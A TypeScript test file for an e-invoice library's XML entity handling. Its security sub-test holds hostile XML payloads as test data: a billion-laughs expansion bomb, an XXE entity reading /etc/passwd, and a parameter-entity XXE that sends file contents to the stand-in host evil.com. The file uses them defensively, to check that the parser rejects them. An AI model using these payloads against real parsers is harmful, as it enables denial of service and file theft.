// einvoice/test/suite/einvoice_parsing/test.parse-09.entity-references.ts
// Snapshot taken 2025-05-25 19:45:37 +00:00 (486 lines, 16 KiB, TypeScript).
//
// NOTE: The repository viewer flagged this file as containing ambiguous Unicode
// characters, i.e. characters that might be confused with other characters.
// They appear to be the intentional symbols used in log output and test data
// (for example ✓, ✗, ⚠️, €, ©, ™), so the warning can be ignored if that is
// the case.

import { expect, tap } from '@git.zone/tstest/tapbundle';
import * as einvoice from '../../../ts/index.js';
import * as plugins from '../../plugins.js';
import { CorpusLoader } from '../../helpers/corpus.loader.js';
import { PerformanceTracker } from '../../helpers/performance.tracker.js';
tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async (t) => {
const performanceTracker = new PerformanceTracker('PARSE-09');
// Sub-test: the five predefined XML entity references.
// For each reference a small XML document is built that uses it in element
// text and in an attribute value, the document is passed to
// EInvoice.fromXmlString, and the outcome (no throw / thrown error) is logged.
await t.test('Predefined XML entities', async () => {
  performanceTracker.startOperation('predefined-entities');

  // `entity` is the escaped reference as it must appear in XML source;
  // `character` is the literal character it stands for.
  const predefinedEntities = [
    {
      name: 'Ampersand',
      // Must be the escaped form: a bare '&' makes the document malformed.
      entity: '&amp;',
      character: '&',
      description: 'Used in company names and text'
    },
    {
      name: 'Less than',
      // Must be the escaped form: a bare '<' makes the document malformed.
      entity: '&lt;',
      character: '<',
      description: 'Used in text content'
    },
    {
      name: 'Greater than',
      entity: '&gt;',
      character: '>',
      description: 'Used in text content'
    },
    {
      name: 'Quote',
      entity: '&quot;',
      character: '"',
      description: 'Used in attribute values'
    },
    {
      name: 'Apostrophe',
      entity: '&apos;',
      character: "'",
      description: 'Used in attribute values'
    }
  ];

  for (const entity of predefinedEntities) {
    const startTime = performance.now();

    // Lines are joined with '\n' so the XML declaration stays at offset 0.
    const testXml = [
      '<?xml version="1.0"?>',
      '<invoice>',
      `<supplier>Test ${entity.entity} Company</supplier>`,
      `<note attribute="${entity.entity}value">Text with ${entity.entity} entity</note>`,
      '</invoice>'
    ].join('\n');

    console.log(`${entity.name} entity (${entity.entity}):`);
    console.log(` Character: "${entity.character}"`);
    console.log(` Usage: ${entity.description}`);

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        await invoice.fromXmlString(testXml);
        console.log(' ✓ Entity resolved correctly');
      } else {
        console.log(' ⚠️ Cannot test without fromXmlString');
      }
    } catch (error: unknown) {
      // Thrown values are not guaranteed to be Error instances.
      const message = error instanceof Error ? error.message : String(error);
      console.log(` ✗ Error: ${message}`);
    }

    performanceTracker.recordMetric('predefined-entity', performance.now() - startTime);
  }

  performanceTracker.endOperation('predefined-entities');
});
// Sub-test: decimal (&#NNN;) and hexadecimal (&#xHHH;) character references.
// Each reference is decoded numerically and compared with the character the
// table claims it represents; the result is logged per reference.
await t.test('Numeric character references', async () => {
  performanceTracker.startOperation('numeric-entities');

  /**
   * Decodes a single numeric character reference.
   * @param ref Reference text such as `&#65;` or `&#x41;`.
   * @returns The referenced character, or undefined when `ref` is not a
   *          numeric character reference.
   * @throws RangeError (from String.fromCodePoint) for an invalid code point.
   */
  const decodeNumericReference = (ref: string): string | undefined => {
    const match = /^&#(?:x([0-9A-Fa-f]+)|(\d+));$/.exec(ref);
    if (!match) {
      return undefined;
    }
    const [, hexDigits, decimalDigits] = match;
    const codePoint =
      hexDigits !== undefined
        ? Number.parseInt(hexDigits, 16)
        : Number.parseInt(decimalDigits ?? '', 10);
    return String.fromCodePoint(codePoint);
  };

  const numericTests = [
    {
      name: 'Decimal references',
      tests: [
        { ref: '&#65;', char: 'A', description: 'Latin capital A' },
        { ref: '&#8364;', char: '€', description: 'Euro sign' },
        { ref: '&#169;', char: '©', description: 'Copyright symbol' },
        { ref: '&#8482;', char: '™', description: 'Trademark symbol' },
        { ref: '&#176;', char: '°', description: 'Degree symbol' }
      ]
    },
    {
      name: 'Hexadecimal references',
      tests: [
        { ref: '&#x41;', char: 'A', description: 'Latin capital A (hex)' },
        { ref: '&#x20AC;', char: '€', description: 'Euro sign (hex)' },
        { ref: '&#xA9;', char: '©', description: 'Copyright (hex)' },
        { ref: '&#x2122;', char: '™', description: 'Trademark (hex)' },
        { ref: '&#xB0;', char: '°', description: 'Degree (hex)' }
      ]
    }
  ];

  for (const category of numericTests) {
    console.log(`\n${category.name}:`);

    for (const test of category.tests) {
      const startTime = performance.now();
      const xml = [
        '<?xml version="1.0"?>',
        '<invoice>',
        `<amount currency="${test.ref}EUR">100.00</amount>`,
        `<temperature>${test.ref}C</temperature>`,
        `<copyright>${test.ref} 2024</copyright>`,
        '</invoice>'
      ].join('\n');

      console.log(` ${test.ref} = "${test.char}" (${test.description})`);

      try {
        // Decode the reference itself instead of substituting the expected
        // character, so a wrong table entry is actually detected.
        const decoded = decodeNumericReference(test.ref);
        // Literal split/join avoids building a RegExp from unescaped text.
        const resolved = decoded === undefined ? xml : xml.split(test.ref).join(decoded);
        if (decoded === test.char && resolved.includes(test.char)) {
          console.log(' ✓ Entity would resolve correctly');
        } else {
          console.log(` ✗ Expected "${test.char}" but decoded "${String(decoded)}"`);
        }
      } catch (error: unknown) {
        const message = error instanceof Error ? error.message : String(error);
        console.log(` ✗ Resolution error: ${message}`);
      }

      performanceTracker.recordMetric('numeric-ref', performance.now() - startTime);
    }
  }

  performanceTracker.endOperation('numeric-entities');
});
// Sub-test: entities declared in an internal DTD subset (plain, parameter and
// nested). Each document is passed to EInvoice.fromXmlString; both outcomes
// are only logged, since the original notes that DTD support may be disabled.
await t.test('Custom entity definitions (DTD)', async () => {
  performanceTracker.startOperation('custom-entities');

  // Shape of one table entry; only `name` and `xml` are present on every case.
  interface CustomEntityCase {
    name: string;
    xml: string;
    entities?: Record<string, string>;
    description?: string;
    expected?: string;
  }

  const customEntityTests: CustomEntityCase[] = [
    {
      name: 'Internal DTD entities',
      xml: [
        '<?xml version="1.0"?>',
        '<!DOCTYPE invoice [',
        '<!ENTITY company "Acme Corporation">',
        '<!ENTITY address "123 Main Street, London">',
        '<!ENTITY year "2024">',
        '<!ENTITY currency "EUR">',
        ']>',
        '<invoice>',
        '<supplier>&company;</supplier>',
        '<supplierAddress>&address;</supplierAddress>',
        '<date>01-01-&year;</date>',
        '<amount currency="&currency;">1000.00</amount>',
        '</invoice>'
      ].join('\n'),
      entities: {
        'company': 'Acme Corporation',
        'address': '123 Main Street, London',
        'year': '2024',
        'currency': 'EUR'
      }
    },
    {
      name: 'Parameter entities',
      xml: [
        '<?xml version="1.0"?>',
        '<!DOCTYPE invoice [',
        '<!ENTITY % common SYSTEM "common.dtd">',
        '%common;',
        '<!ENTITY company "Test Company">',
        ']>',
        '<invoice>',
        '<supplier>&company;</supplier>',
        '</invoice>'
      ].join('\n'),
      description: 'External parameter entities (security risk)'
    },
    {
      name: 'Nested entity references',
      xml: [
        '<?xml version="1.0"?>',
        '<!DOCTYPE invoice [',
        '<!ENTITY city "London">',
        '<!ENTITY country "UK">',
        '<!ENTITY fullAddress "&city;, &country;">',
        ']>',
        '<invoice>',
        '<address>&fullAddress;</address>',
        '</invoice>'
      ].join('\n'),
      expected: 'London, UK'
    }
  ];

  for (const test of customEntityTests) {
    const startTime = performance.now();
    console.log(`\n${test.name}:`);

    if (test.entities) {
      console.log(' Defined entities:');
      for (const [name, value] of Object.entries(test.entities)) {
        console.log(` &${name}; = "${value}"`);
      }
    }
    if (test.description) {
      console.log(` Note: ${test.description}`);
    }
    if (test.expected) {
      console.log(` Expected result: ${test.expected}`);
    }

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        // Note: Many parsers disable DTD processing by default for security
        await invoice.fromXmlString(test.xml);
        console.log(' ✓ Parsed (DTD support may vary)');
      }
    } catch (error: unknown) {
      // Thrown values are not guaranteed to be Error instances.
      const message = error instanceof Error ? error.message : String(error);
      console.log(` ⚠️ DTD parsing: ${message}`);
      console.log(' Note: DTD processing often disabled for security');
    }

    performanceTracker.recordMetric('custom-entity', performance.now() - startTime);
  }

  performanceTracker.endOperation('custom-entities');
});
// Sub-test: hostile entity constructs (entity-expansion bomb, external entity,
// parameter-entity exfiltration). Each document is passed to
// EInvoice.fromXmlString; a thrown error is logged as a correct rejection and
// a completed parse is logged as a security warning.
// NOTE(review): outcomes are only logged and nothing is asserted, so this
// sub-test cannot fail; a completed parse also does not by itself show that
// the entities were expanded. Consider asserting on the parsed result.
await t.test('Entity security considerations', async () => {
  performanceTracker.startOperation('entity-security');

  const securityTests = [
    {
      name: 'Billion laughs attack (XML bomb)',
      xml: [
        '<?xml version="1.0"?>',
        '<!DOCTYPE lolz [',
        '<!ENTITY lol "lol">',
        '<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">',
        '<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">',
        '<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">',
        ']>',
        '<invoice>',
        '<data>&lol4;</data>',
        '</invoice>'
      ].join('\n'),
      risk: 'Exponential entity expansion',
      mitigation: 'Disable DTD processing or limit entity expansion'
    },
    {
      name: 'External entity injection (XXE)',
      xml: [
        '<?xml version="1.0"?>',
        '<!DOCTYPE invoice [',
        '<!ENTITY xxe SYSTEM "file:///etc/passwd">',
        ']>',
        '<invoice>',
        '<data>&xxe;</data>',
        '</invoice>'
      ].join('\n'),
      risk: 'File disclosure, SSRF',
      mitigation: 'Disable external entity resolution'
    },
    {
      name: 'Parameter entity XXE',
      xml: [
        '<?xml version="1.0"?>',
        '<!DOCTYPE invoice [',
        '<!ENTITY % file SYSTEM "file:///etc/passwd">',
        // Backticks because this line contains both quote styles.
        `<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?data=%file;'>">`,
        '%eval;',
        '%exfil;',
        ']>',
        '<invoice></invoice>'
      ].join('\n'),
      risk: 'Out-of-band data exfiltration',
      mitigation: 'Disable parameter entities'
    }
  ];

  for (const test of securityTests) {
    console.log(`\n${test.name}:`);
    console.log(` Risk: ${test.risk}`);
    console.log(` Mitigation: ${test.mitigation}`);

    const startTime = performance.now();
    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        await invoice.fromXmlString(test.xml);
        console.log(' ⚠️ SECURITY WARNING: Parser allowed dangerous entities!');
      }
    } catch (error: unknown) {
      // Thrown values are not guaranteed to be Error instances.
      const message = error instanceof Error ? error.message : String(error);
      console.log(' ✓ Parser correctly rejected dangerous entities');
      console.log(` Error: ${message}`);
    }

    performanceTracker.recordMetric('security-test', performance.now() - startTime);
  }

  performanceTracker.endOperation('entity-security');
});
// Sub-test: prints a catalogue of entity references grouped by category,
// showing each sample text together with the reference(s) it contains and the
// character(s) they stand for. Nothing is parsed here; the block only logs.
await t.test('Entity usage in e-invoices', async () => {
  performanceTracker.startOperation('einvoice-entities');

  const einvoicePatterns = [
    {
      name: 'Currency symbols',
      examples: [
        { text: 'Price in &#8364; (EUR)', entity: '&#8364;', resolved: '€' },
        { text: 'Amount in &#163; (GBP)', entity: '&#163;', resolved: '£' },
        { text: 'Cost in &#36; (USD)', entity: '&#36;', resolved: '$' },
        { text: 'Price in &#165; (JPY)', entity: '&#165;', resolved: '¥' }
      ]
    },
    {
      name: 'Special characters in company names',
      examples: [
        { text: 'Smith &amp; Jones Ltd.', entity: '&amp;', resolved: '&' },
        { text: 'AT&amp;T Communications', entity: '&amp;', resolved: '&' },
        { text: 'L&apos;Oréal Paris', entity: '&apos;', resolved: "'" },
        { text: '&quot;Best Price&quot; Store', entity: '&quot;', resolved: '"' }
      ]
    },
    {
      name: 'Legal symbols',
      examples: [
        { text: 'Copyright &#169; 2024', entity: '&#169;', resolved: '©' },
        { text: 'Registered &#174;', entity: '&#174;', resolved: '®' },
        { text: 'Trademark &#8482;', entity: '&#8482;', resolved: '™' }
      ]
    },
    {
      name: 'Mathematical symbols',
      examples: [
        { text: 'Temperature &#177;2&#176;C', entity: '&#177;/&#176;', resolved: '±/°' },
        { text: 'Discount &#8804; 50%', entity: '&#8804;', resolved: '≤' },
        { text: 'Quantity &#215; Price', entity: '&#215;', resolved: '×' }
      ]
    }
  ];

  for (const category of einvoicePatterns) {
    console.log(`\n${category.name}:`);
    for (const example of category.examples) {
      console.log(` "${example.text}"`);
      // Separate the reference from its resolved character; without the
      // arrow the two run together (e.g. "&#8364;€").
      console.log(` Entity: ${example.entity} → ${example.resolved}`);
    }
  }

  performanceTracker.endOperation('einvoice-entities');
});
// Sub-test: scans up to 100 corpus files matching .xml/.ubl/.cii and counts,
// per file, the presence of predefined entity references, numeric character
// references, DOCTYPE/ENTITY declarations and custom <!ENTITY declarations,
// then prints the totals.
await t.test('Corpus entity analysis', async () => {
  performanceTracker.startOperation('corpus-entities');

  const corpusLoader = new CorpusLoader();
  const xmlFiles = await corpusLoader.getFiles(/\.(xml|ubl|cii)$/);
  console.log(`\nAnalyzing entity usage in ${xmlFiles.length} corpus files...`);

  const entityStats = {
    total: 0,
    filesWithEntities: 0,
    predefinedEntities: new Map<string, number>(),
    numericEntities: 0,
    customEntities: 0,
    dtdFiles: 0
  };

  // Loop-invariant lookups, built once instead of once per file.
  const predefined = ['&amp;', '&lt;', '&gt;', '&quot;', '&apos;'];
  const numericReference = /&#\d+;|&#x[\dA-Fa-f]+;/;

  const sampleSize = Math.min(100, xmlFiles.length);
  const sampledFiles = xmlFiles.slice(0, sampleSize);

  for (const file of sampledFiles) {
    try {
      const content = await plugins.fs.readFile(file.path, 'utf8');
      // Count the file only once it has actually been read, so unreadable
      // files do not dilute the percentage reported below.
      entityStats.total++;
      let hasEntities = false;

      // Check for predefined entities
      for (const entity of predefined) {
        if (content.includes(entity)) {
          hasEntities = true;
          entityStats.predefinedEntities.set(
            entity,
            (entityStats.predefinedEntities.get(entity) ?? 0) + 1
          );
        }
      }

      // Check for numeric entities
      if (numericReference.test(content)) {
        hasEntities = true;
        entityStats.numericEntities++;
      }

      // Check for DTD; a custom entity requires an actual <!ENTITY
      // declaration, a bare <!DOCTYPE does not define one.
      const declaresEntity = content.includes('<!ENTITY');
      if (content.includes('<!DOCTYPE') || declaresEntity) {
        entityStats.dtdFiles++;
      }
      if (declaresEntity) {
        entityStats.customEntities++;
      }

      if (hasEntities) {
        entityStats.filesWithEntities++;
      }
    } catch (error: unknown) {
      // Best effort: keep going, but say which file was skipped and why.
      const message = error instanceof Error ? error.message : String(error);
      console.log(` Skipped ${file.path}: ${message}`);
    }
  }

  // Guard the ratio so an empty or fully unreadable sample prints 0.0% rather than NaN%.
  const entityShare =
    entityStats.total > 0
      ? (entityStats.filesWithEntities / entityStats.total * 100).toFixed(1)
      : '0.0';

  console.log('\nEntity Usage Statistics:');
  console.log(`Files analyzed: ${entityStats.total}`);
  console.log(`Files with entities: ${entityStats.filesWithEntities} (${entityShare}%)`);
  console.log('\nPredefined entities:');
  for (const [entity, count] of entityStats.predefinedEntities.entries()) {
    console.log(` ${entity}: ${count} files`);
  }
  console.log(`\nNumeric entities: ${entityStats.numericEntities} files`);
  console.log(`DTD declarations: ${entityStats.dtdFiles} files`);
  console.log(`Custom entities: ${entityStats.customEntities} files`);

  performanceTracker.endOperation('corpus-entities');
});
// Sub-test: times EInvoice.fromXmlString on generated documents with
// 10/100/500/1000 fields, each field carrying three entity references, and
// logs the parse time and throughput per size.
await t.test('Entity resolution performance', async () => {
  performanceTracker.startOperation('entity-performance');

  /**
   * Generates XML with varying entity density.
   * @param entityCount Number of <fieldN> elements to emit; each contains
   *                    three references (&amp;, &#8364;, &#169;).
   * @returns The complete XML document as a string.
   */
  const generateXmlWithEntities = (entityCount: number): string => {
    const fields = Array.from(
      { length: entityCount },
      (_, i) => ` <field${i}>Text with &amp; entity &#8364; and &#169; symbols</field${i}>\n`
    );
    return `<?xml version="1.0"?>\n<invoice>\n${fields.join('')}</invoice>`;
  };

  const testSizes = [10, 100, 500, 1000];
  console.log('\nEntity resolution performance:');

  for (const size of testSizes) {
    const xml = generateXmlWithEntities(size);
    const xmlSize = Buffer.byteLength(xml, 'utf8');
    const entityCount = size * 3; // 3 entities per field
    const startTime = performance.now();

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        await invoice.fromXmlString(xml);
      }
      const parseTime = performance.now() - startTime;
      // A zero timer delta would otherwise print "Infinity".
      const throughput = parseTime > 0 ? (entityCount / parseTime).toFixed(1) : 'n/a';

      console.log(` ${entityCount} entities (${(xmlSize/1024).toFixed(1)}KB):`);
      console.log(` Parse time: ${parseTime.toFixed(2)}ms`);
      console.log(` Entities/ms: ${throughput}`);
      performanceTracker.recordMetric(`entities-${size}`, parseTime);
    } catch (error: unknown) {
      // Thrown values are not guaranteed to be Error instances.
      const message = error instanceof Error ? error.message : String(error);
      console.log(` Error with ${size} entities: ${message}`);
    }
  }

  performanceTracker.endOperation('entity-performance');
});
// Print the tracker's summary, preceded by a blank line.
console.log('\n' + performanceTracker.getSummary());

// Print the heading and the numbered best-practice list, one entry per line.
const bestPracticeLines = [
  '\nEntity Reference Resolution Best Practices:',
  '1. Always handle predefined XML entities (&amp; &lt; &gt; &quot; &apos;)',
  '2. Support numeric character references (decimal and hex)',
  '3. Be cautious with DTD processing (security risks)',
  '4. Disable external entity resolution by default',
  '5. Limit entity expansion depth to prevent attacks',
  '6. Validate resolved content after entity expansion',
  '7. Consider entity usage impact on performance',
  '8. Document security settings clearly for users'
];
for (const line of bestPracticeLines) {
  console.log(line);
}
});
// Start the tap runner; presumably this executes the test registered with
// tap.test above (behaviour is defined by @git.zone/tstest/tapbundle).
tap.start();